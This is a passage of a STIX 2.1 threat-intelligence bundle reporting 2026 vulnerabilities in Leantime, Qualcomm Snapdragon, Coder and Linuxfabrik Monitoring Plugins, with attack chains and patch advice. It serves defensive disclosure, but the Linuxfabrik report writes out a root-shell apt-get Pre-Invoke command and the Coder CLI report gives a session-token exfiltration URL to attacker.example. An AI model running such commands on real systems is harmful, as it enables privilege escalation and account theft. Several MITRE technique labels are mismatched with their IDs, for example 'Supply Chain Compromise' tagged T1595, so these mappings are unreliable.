      "published": "2026-07-06T21:23:52Z",
      "labels": [
        "csrf",
        "oidc",
        "session-fixation",
        "web-application",
        "vulnerability",
        "leantime"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59713"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3228f757-b103-5f39-8e6b-0447f1457ca1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/Leantime/leantime/commit/4f2612d13e0e8a2093092a846b44506cf133b671",
      "pattern": "[url:value = 'https://github.com/Leantime/leantime/commit/4f2612d13e0e8a2093092a846b44506cf133b671']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T21:22:44Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f2a31046-c395-579b-8413-6dd760d949c0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bb622ba9-b015-5b04-a761-fe73bb62acc8",
      "target_ref": "indicator--3228f757-b103-5f39-8e6b-0447f1457ca1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--235a6414-4956-58e5-972b-1f9e5e635b86",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/Leantime/leantime/issues/3556",
      "pattern": "[url:value = 'https://github.com/Leantime/leantime/issues/3556']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T21:22:44Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ac8bd3c1-f888-5ac8-8b7a-f5c248495f7c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bb622ba9-b015-5b04-a761-fe73bb62acc8",
      "target_ref": "indicator--235a6414-4956-58e5-972b-1f9e5e635b86"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--dd4aa954-0ea4-5cbe-b47b-6d4656420d01",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.vulncheck.com/advisories/leantime-credential-disclosure-via-unauthenticated-json-rpc-users-getuser-method",
      "pattern": "[url:value = 'https://www.vulncheck.com/advisories/leantime-credential-disclosure-via-unauthenticated-json-rpc-users-getuser-method']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T21:22:44Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4e14caff-90af-50d4-b449-942bf069637c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bb622ba9-b015-5b04-a761-fe73bb62acc8",
      "target_ref": "indicator--dd4aa954-0ea4-5cbe-b47b-6d4656420d01"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--be46f245-52f9-5476-ba19-d088f6746c1d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bb622ba9-b015-5b04-a761-fe73bb62acc8",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Brute Force",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1110",
          "url": "https://attack.mitre.org/techniques/T1110"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3ec8e8f0-4142-51c7-bc4e-b89174c9e09b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bb622ba9-b015-5b04-a761-fe73bb62acc8",
      "target_ref": "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steal Web Session Cookie",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1539",
          "url": "https://attack.mitre.org/techniques/T1539"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--33752442-18ef-5bc9-8683-8fbf4aba8cdb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bb622ba9-b015-5b04-a761-fe73bb62acc8",
      "target_ref": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--bb622ba9-b015-5b04-a761-fe73bb62acc8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-59712: Leantime JSON-RPC API Authorization Bypass Leads to Credential Disclosure",
      "description": "## Overview\n\nCVE-2026-59712 describes a critical authorization bypass vulnerability in Leantime, an open-source project management system. The flaw exists within the `Users::getUser` method of its JSON-RPC API, where proper authorization checks are missing. This allows any authenticated user, regardless of their privilege level, to retrieve full user credential rows for any other user by simply providing arbitrary user IDs in the API call. This vulnerability was published to NVD on July 6, 2026, and impacts Leantime versions up to and including 3.4.4. Attackers can leverage this to enumerate all accounts on a compromised system, obtain sensitive data like password hashes, Time-based One-Time Password (TOTP) secrets, and session tokens, ultimately enabling sophisticated attacks such as offline password cracking, two-factor authentication bypass, and session hijacking. The exploitation of this vulnerability could lead to widespread unauthorized access and data exfiltration within an organization using Leantime.\n\n## Attack Chain\n\n1.  An attacker obtains initial access to the Leantime application through a low-privileged authenticated user account.\n2.  The attacker authenticates to the Leantime application using the compromised or created low-privileged credentials.\n3.  The attacker identifies the JSON-RPC API endpoint for user management.\n4.  The attacker crafts malicious JSON-RPC requests targeting the `users.getUser` method, specifying arbitrary `user_id` values.\n5.  Due to the authorization bypass (CVE-2026-59712), the API responds with full user credential rows, including password hashes, TOTP secrets, and session tokens, for the requested user IDs.\n6.  The attacker iteratively sends requests with different `user_id` values to enumerate and collect sensitive information for multiple or all users within the Leantime instance.\n7.  The collected password hashes are then subjected to offline password cracking attempts to recover plaintext passwords.\n8.  Recovered passwords, TOTP secrets, and session tokens enable the attacker to bypass multi-factor authentication, hijack active user sessions, and gain unauthorized access to other user accounts, potentially escalating privileges.\n\n## Impact\n\nThe successful exploitation of CVE-2026-59712 leads to complete compromise of user accounts within the affected Leantime instance. Attackers can gain unauthorized access to all projects, tasks, and sensitive data managed within the application, including those belonging to high-privileged users like administrators. The disclosure of password hashes, TOTP secrets, and session tokens provides avenues for persistent access, privilege escalation, and bypass of standard security controls such as two-factor authentication. This can result in significant data exfiltration, intellectual property theft, and broader organizational compromise if Leantime manages critical business processes or sensitive information. The specific number of victims will vary per affected organization, but all user accounts within a vulnerable instance are at risk of compromise.\n\n## Recommendation\n\n*   **Patch CVE-2026-59712 immediately** by updating Leantime to a patched version beyond 3.4.4. Refer to the official Leantime GitHub repository for security updates and recommended mitigation steps.\n*   **Monitor webserver logs** for unusual HTTP POST requests to Leantime's JSON-RPC API endpoints, especially those targeting the `users.getUser` method with multiple or iterative `user_id` parameters from a single source IP or authenticated session.\n*   **Implement network segmentation** to restrict access to the Leantime application from untrusted networks and ensure the JSON-RPC API is not directly exposed to the internet if not strictly necessary.\n*   **Rotate all user credentials and sessions** for your Leantime instance after applying the patch, as existing credentials and session tokens might have been compromised.\n",
      "published": "2026-07-06T21:22:44Z",
      "labels": [
        "authorization-bypass",
        "credential-disclosure",
        "api-exploitation",
        "web-vulnerability",
        "cve"
      ],
      "object_refs": [
        "indicator--3228f757-b103-5f39-8e6b-0447f1457ca1",
        "indicator--235a6414-4956-58e5-972b-1f9e5e635b86",
        "indicator--dd4aa954-0ea4-5cbe-b47b-6d4656420d01",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51",
        "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59712"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/Leantime/leantime"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/Leantime/leantime/commit/4f2612d13e0e8a2093092a846b44506cf133b671"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/Leantime/leantime/issues/3556"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/leantime-credential-disclosure-via-unauthenticated-json-rpc-users-getuser-method"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--93ac9d9f-1429-5346-9693-7f7bfe909932",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-25271: Memory Corruption in Qualcomm Snapdragon",
      "description": "## Overview\n\nA high-severity memory corruption vulnerability, CVE-2026-25271, has been identified in Qualcomm Snapdragon products, affecting a wide range of versions including Snapdragon Compute and Industrial IOT platforms, FastConnect series (6900, 7800), and various IQX, SC, WCD, WSA, X, and XG series components. This vulnerability, classified as a Time-of-check Time-of-use (TOCTOU) race condition (CWE-367), arises from the improper handling of modified asynchronous input parameters between their validation and subsequent use. Discovered by Qualcomm, Inc. and published on 2026-07-06, successful exploitation could allow a local, low-privileged attacker to achieve high impact on the confidentiality, integrity, and availability of the affected system without requiring user interaction. While specific exploit details are not public, the nature of memory corruption and TOCTOU vulnerabilities often leads to privilege escalation or arbitrary code execution.\n\n## Attack Chain\n\nThe provided source describes a vulnerability (CVE-2026-25271) as a memory corruption due to a Time-of-Check Time-of-Use (TOCTOU) race condition in Qualcomm Snapdragon components. It does not detail specific observed exploitation steps or a full attack chain. Exploitation typically involves a local, low-privileged attacker carefully timing operations to modify asynchronous input parameters between a security check and their subsequent use, thereby bypassing intended security controls. This could lead to a corrupted memory state, which can be leveraged for privilege escalation or arbitrary code execution. Further steps in an attacker's chain would depend on the specific privileges gained and the system's configuration.\n\n## Impact\n\nA successful exploitation of CVE-2026-25271 can lead to severe consequences, as indicated by its CVSS v3.1 score of 7.8 (High). This memory corruption vulnerability allows a local, low-privileged attacker to achieve high impact on confidentiality, integrity, and availability. This could manifest as arbitrary code execution within the kernel or a privileged process, enabling the attacker to bypass security mechanisms, access sensitive data, or render the system unstable or inoperable. The widespread nature of affected Qualcomm Snapdragon components means a broad range of devices, from compute platforms to IoT and connectivity modules, are at risk.\n\n## Recommendation\n\n*   Apply the security updates provided by Qualcomm, Inc. as detailed in the official security bulletin referenced for CVE-2026-25271, targeting all affected Snapdragon products.\n*   Prioritize patching for all Qualcomm Snapdragon Compute and Industrial IOT products, as well as FastConnect 6900/7800, and other listed affected versions (like IQX5121, IQX7181, SC8380XP, WCD9378C, WCD9380, WCD9385, WSA8840, WSA8845, WSA8845H, X2000077, X2000086, X2000090, X2000092, X2000094, XG101002, XG101032, XG101039) for CVE-2026-25271.\n*   Monitor system event logs on devices using affected Qualcomm Snapdragon components for crashes, unexpected reboots, or unusual process behavior that might indicate an attempted exploitation of CVE-2026-25271.\n",
      "published": "2026-07-06T21:21:29Z",
      "labels": [
        "vulnerability",
        "memory-corruption",
        "qualcomm",
        "snapdragon",
        "cve"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25271"
        },
        {
          "source_name": "reference",
          "url": "https://docs.qualcomm.com/product/publicresources/securitybulletin/july-2026-bulletin.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Supply Chain Compromise",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1595",
          "url": "https://attack.mitre.org/techniques/T1595"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2f896787-5da2-5c90-9801-4a9a64d53941",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5d1e7634-762f-5e78-9d1a-9feda868d5a5",
      "target_ref": "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--05c9ee42-89b4-57c8-a0fc-7f031f825405",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Network Sniffing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1040",
          "url": "https://attack.mitre.org/techniques/T1040"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fe3f9f52-b568-50c4-a973-51c5d36be9a3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5d1e7634-762f-5e78-9d1a-9feda868d5a5",
      "target_ref": "attack-pattern--05c9ee42-89b4-57c8-a0fc-7f031f825405"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--123affda-6f11-58dc-8db2-3ea6a4c43493",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Credential Acquisition",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1556",
          "url": "https://attack.mitre.org/techniques/T1556"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5d6284cf-3c28-54ca-8ff3-bbbaa0e9f285",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5d1e7634-762f-5e78-9d1a-9feda868d5a5",
      "target_ref": "attack-pattern--123affda-6f11-58dc-8db2-3ea6a4c43493"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5d1e7634-762f-5e78-9d1a-9feda868d5a5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Coder AI Bridge Proxy TLS Certificate Verification Bypass (CVE-2026-55436)",
      "description": "## Overview\n\nA critical vulnerability, CVE-2026-55436, has been identified in the Coder AI Bridge Proxy (`aibridgeproxyd`), affecting versions 2.30.0 through 2.34.1. The proxy, when operating in its default configuration without an explicit upstream proxy, was found to set `InsecureSkipVerify: true` for outbound HTTPS connections to the Coder access URL. This misconfiguration allows the proxy to accept any TLS certificate, bypassing essential verification. An attacker with a Man-in-the-Middle (MITM) position between the AI Bridge Proxy and the Coder server could exploit this to intercept sensitive communications. This vulnerability poses a significant risk to the confidentiality of Coder session tokens, user-supplied provider API keys, and all data exchanged, including prompts and completions.\n\n## Attack Chain\n\n1.  **Initial Access / Positioning**: An attacker gains a Man-in-the-Middle (MITM) position on the network path between the AI Bridge Proxy and the Coder server. This can be achieved through methods like ARP spoofing, DNS poisoning, or by gaining control over environment variables (e.g., `HTTP_PROXY`, `HTTPS_PROXY`) that redirect proxy traffic.\n2.  **Outbound Connection**: The `aibridgeproxyd` service initiates an outbound HTTPS connection to the Coder server's access URL to fetch or send data.\n3.  **TLS Interception**: The attacker intercepts this HTTPS connection and presents a forged TLS certificate to the AI Bridge Proxy.\n4.  **Certificate Acceptance**: Due to the `InsecureSkipVerify: true` setting in the default configuration, the AI Bridge Proxy fails to validate the attacker's forged TLS certificate and establishes a seemingly secure connection with the attacker.\n5.  **Traffic Decryption**: The attacker, now acting as an intermediary, can decrypt the traffic flowing between the proxy and the Coder server.\n6.  **Sensitive Data Interception**: The attacker extracts sensitive information from the intercepted traffic, including Coder session tokens, user-supplied provider API keys (BYOK), and the full request and response bodies, which may contain AI prompts and completions.\n7.  **Impact Fulfillment**: The attacker can use the stolen session tokens or API keys to impersonate users, access data, or perform unauthorized actions within the Coder environment or linked services.\n\n## Impact\n\nThe successful exploitation of CVE-2026-55436 allows an attacker to intercept highly sensitive data in transit between the AI Bridge Proxy and the Coder server. This includes Coder session tokens, which could be used for session hijacking and unauthorized access, as well as user-supplied provider API keys (Bring Your Own Key - BYOK) for AI services, leading to compromise of those external accounts. Furthermore, the attacker can access entire request and response bodies, exposing confidential prompts and AI-generated completions. Organizations utilizing Coder deployments where the AI Bridge Proxy communicates with the Coder server over a network path vulnerable to MITM attacks are at risk of significant data breaches and potential credential compromise.\n\n## Recommendation\n\n*   Immediately patch all affected Coder AI Bridge Proxy installations to the latest patched versions: `v2.34.2`, `v2.33.8`, or `v2.32.7` to address CVE-2026-55436.\n*   Ensure the Coder access URL uses a trusted certificate to prevent easy spoofing in case of an existing MITM.\n*   Secure the network path between the AI Bridge Proxy and the Coder server, for example, by ensuring they are co-located over loopback or by implementing mutual TLS (mTLS) for enhanced authentication.\n*   Audit network configurations to identify and mitigate potential Man-in-the-Middle attack vectors, such as insecure DNS configurations or ARP spoofing vulnerabilities.\n",
      "published": "2026-07-06T21:16:13Z",
      "labels": [
        "vulnerability",
        "man-in-the-middle",
        "tls",
        "data-exfiltration"
      ],
      "object_refs": [
        "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c",
        "attack-pattern--05c9ee42-89b4-57c8-a0fc-7f031f825405",
        "attack-pattern--123affda-6f11-58dc-8db2-3ea6a4c43493"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-84rm-42xw-mx52"
        },
        {
          "source_name": "reference",
          "url": "CVE-2026-55436"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Abuse Elevation Control Mechanism",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1548",
          "url": "https://attack.mitre.org/techniques/T1548"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2377b8f7-5786-5364-95cc-9a76d1185ee9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--85ca4a45-f434-564e-8092-c131c8fc6e80",
      "target_ref": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--85ca4a45-f434-564e-8092-c131c8fc6e80",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Linuxfabrik Monitoring Plugins Local Privilege Escalation via Sudo apt-get",
      "description": "## Overview\n\nA significant local privilege escalation (LPE) vulnerability, tracked as CVE-2026-52817, has been identified in Linuxfabrik Monitoring Plugins, specifically affecting installations using the provided `Debian.sudoers` file. This flaw permits the `nagios` user, configured to run `apt-get` via `sudo` without strict argument enforcement, to inject malicious parameters into the `apt-get` command. An attacker who has already compromised the `nagios` account can leverage this to execute arbitrary commands with root privileges, effectively gaining a root shell. The vulnerability impacts environments where the `Linuxfabrik Monitoring Plugins` are deployed on Debian systems with the vulnerable `sudoers` configuration, particularly versions of `pip/linuxfabrik-lib` up to and including 5.0.0. This LPE poses a severe risk as it allows an attacker to escalate from a potentially low-privileged service account to full system compromise.\n\n## Attack Chain\n\n1.  An attacker gains initial access to a Debian system, compromising the `nagios` user account (e.g., via a compromised monitoring agent or service).\n2.  The attacker identifies that the `nagios` user has `sudo` privileges for `apt-get` commands, specifically due to the permissive entry in `/etc/sudoers.d/Debian.sudoers`.\n3.  The attacker constructs a malicious `apt-get` command utilizing the `-o` option to inject a `Pre-Invoke` hook.\n4.  The attacker executes `sudo apt-get update -o APT::Update::Pre-Invoke::=\"/bin/sh\"` as the `nagios` user.\n5.  `sudo` executes `apt-get update` with root privileges.\n6.  During the `apt-get` update process, the `APT::Update::Pre-Invoke` option causes `/bin/sh` to be executed with root privileges before the update officially starts.\n7.  The attacker gains a fully functional root shell, bypassing standard privilege separation.\n8.  The attacker can now execute arbitrary commands, install malicious software, or modify system configurations with administrative privileges.\n\n## Impact\n\nThis local privilege escalation allows a threat actor to achieve full root access on a compromised Debian system, provided they have already gained initial access to the `nagios` user account. Successful exploitation means an attacker can move from a potentially isolated monitoring context to complete control over the host system. This can lead to severe data breaches, system integrity compromise, installation of backdoors, further lateral movement within the network, or deployment of ransomware. While the prerequisite of `nagios` account compromise is a high barrier, the resulting root access represents a critical security failure for affected organizations, potentially affecting any sector utilizing Linuxfabrik Monitoring Plugins on Debian.\n\n## Recommendation\n\n*   **Patch CVE-2026-52817** by updating `pip/linuxfabrik-lib` to a version greater than 5.0.0, or apply the recommended `sudoers` file configuration change mentioned in the advisory immediately.\n*   **Deploy the Sigma rule** provided in this brief to your SIEM to detect attempts to exploit CVE-2026-52817.\n*   **Review `sudoers` configurations** across your Linux fleet for overly permissive entries, especially for service accounts, following the principle of least privilege.\n*   **Enable process command-line logging** (e.g., via Auditd or Sysmon for Linux) to ensure the necessary telemetry for detecting the malicious `apt-get` execution.\n",
      "published": "2026-07-03T11:27:55Z",
      "labels": [
        "privilege-escalation",
        "linux",
        "sudo",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-8w6w-23mq-h8rg"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--48ca7ce3-17df-51e9-b7fe-c594c0d0891f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: attacker.example",
      "pattern": "[domain-name:value = 'attacker.example']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T21:10:28Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e4a6da11-adea-588d-a5bb-1498053331d8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c082f5ca-824d-5254-8d70-900628fc1131",
      "target_ref": "indicator--48ca7ce3-17df-51e9-b7fe-c594c0d0891f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steal Web Session Cookie",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1539",
          "url": "https://attack.mitre.org/techniques/T1539"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bc31afa5-2d6d-54f0-b431-89c992872ff1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c082f5ca-824d-5254-8d70-900628fc1131",
      "target_ref": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c082f5ca-824d-5254-8d70-900628fc1131",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Coder `coder open app` Session Token Leakage Vulnerability (CVE-2026-55431)",
      "description": "## Overview\n\nA high-severity vulnerability (CVE-2026-55431) has been identified in the `coder` CLI, specifically impacting the `coder open app` command. This flaw allows an attacker who controls the contents of a Coder workspace to define malicious external application URLs that embed a `$SESSION_TOKEN` placeholder. When a user executes `coder open app` against such a compromised workspace, the CLI erroneously replaces the placeholder with the user's active session token without validating the URL's scheme or host. This crafted URL, now containing the sensitive session token, is then opened by the operating system's default handler (typically a web browser), inadvertently sending the token to an attacker-controlled domain. This vulnerability facilitates full account impersonation for the duration of the session token's validity and can also be used to invoke arbitrary local URI scheme handlers. The issue affects Coder versions prior to 2.34.2, 2.33.8, 2.32.7, and 2.29.17.\n\n## Attack Chain\n\n1.  **Initial Compromise**: An attacker gains control over the definition of an external application within a Coder workspace, typically by authoring or modifying a malicious workspace template.\n2.  **Malicious Configuration**: The attacker configures the external application's URL to include the `$SESSION_TOKEN` placeholder and points it to an attacker-controlled domain (e.g., `https://attacker.example/?t=$SESSION_TOKEN`).\n3.  **User Interaction**: A legitimate Coder user, interacting with their environment, invokes the `coder open app` command, targeting the compromised or maliciously configured workspace.\n4.  **Token Substitution**: The vulnerable `coder` CLI, failing to validate the URL's scheme or host, replaces the `$SESSION_TOKEN` placeholder with the user's active session token.\n5.  **External Launch**: The CLI then hands off the maliciously crafted URL, now containing the session token, to the operating system's default handler (e.g., a web browser) for execution.\n6.  **Data Exfiltration**: The handling application (e.g., web browser) performs a GET request to the attacker-controlled server (`attacker.example`), inadvertently transmitting the victim's session token as a URL parameter.\n7.  **Account Impersonation**: The attacker captures the exfiltrated session token and uses it to gain unauthorized, full access to the victim's Coder account, allowing for complete impersonation and control.\n\n## Impact\n\nThis vulnerability poses a significant risk as it enables full account impersonation, granting attackers unauthorized access to a victim's Coder account and potentially any resources accessible through that account. If exploited, an attacker can perform any action the compromised user is authorized to do, including accessing code, deploying resources, or modifying configurations within the Coder environment. The vulnerability also carries the risk of invoking arbitrary local URI scheme handlers, which could lead to further compromise or execution of malicious code on the victim's machine. The primary target is any user who interacts with potentially untrusted Coder workspaces using the `coder open app` command.\n\n## Recommendation\n\n*   **Patch CVE-2026-55431** immediately by upgrading Coder CLI to version `v2.34.2`, `v2.33.8`, `v2.32.7`, `v2.29.17`, or newer, as specified in the patches section.\n*   **Implement User Awareness Training**: Educate users to avoid running the `coder open app` command for workspaces with unknown or untrusted origins as per the workaround.\n*   **Monitor Network Traffic**: Block outbound connections to the domain `attacker.example` at the network perimeter.\n",
      "published": "2026-07-06T21:10:28Z",
      "labels": [
        "credential-access",
        "vulnerability",
        "cli-exploitation",
        "token-leakage",
        "coder"
      ],
      "object_refs": [
        "indicator--48ca7ce3-17df-51e9-b7fe-c594c0d0891f",
        "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-v54h-cp2w-9x4g"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8e1ff95a-a6e7-5294-8e22-bee2e9c943e9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bed96ad3-e6c9-5001-95f3-0786634345e0",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1136",
          "url": "https://attack.mitre.org/techniques/T1136"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6c2c1f13-e8b7-54a4-a8f3-d5dd223401b9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bed96ad3-e6c9-5001-95f3-0786634345e0",
      "target_ref": "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--03bc2387-59cb-5080-aef9-0ae5c4c7ec83",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
